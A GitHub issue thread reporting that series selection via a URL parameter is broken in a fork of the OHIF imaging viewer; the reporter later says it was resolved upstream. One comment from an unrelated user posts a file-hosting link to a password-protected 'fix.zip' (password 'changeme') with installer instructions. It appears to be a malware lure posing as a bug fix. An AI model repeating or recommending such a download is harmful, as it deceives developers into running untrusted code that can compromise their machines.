### ISSUE TITLE
[Bug] Series selection via URL appears to be broken

### ISSUE THREAD

**Issue by fedorov** [ImagingDataCommons/ViewersV3#64]
### Describe the Bug

https://testing-viewer.canceridc.dev/v3/viewer/?StudyInstanceUIDs=1.2.840.113654.2.55.327670372562599702205432127692146974562&SeriesInstanceUID=1.2.840.113654.2.55.71263399928421039572326605504649736531

I do not know if this is specific to our fork, or an upstream issue. Could this be related to https://github.com/OHIF/Viewers/pull/4328?

### Steps to Reproduce

https://testing-viewer.canceridc.dev/v3/viewer/?StudyInstanceUIDs=1.2.840.113654.2.55.327670372562599702205432127692146974562&SeriesInstanceUID=1.2.840.113654.2.55.71263399928421039572326605504649736531

### The current behavior

https://testing-viewer.canceridc.dev/v3/viewer/?StudyInstanceUIDs=1.2.840.113654.2.55.327670372562599702205432127692146974562&SeriesInstanceUID=1.2.840.113654.2.55.71263399928421039572326605504649736531

### The expected behavior

https://testing-viewer.canceridc.dev/v3/viewer/?StudyInstanceUIDs=1.2.840.113654.2.55.327670372562599702205432127692146974562&SeriesInstanceUID=1.2.840.113654.2.55.71263399928421039572326605504649736531

### OS

macOS

### Node version

n/a

### Browser

Chrome

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by fedorov** [comment]
Resolved upstream by https://github.com/OHIF/Viewers/pull/4346
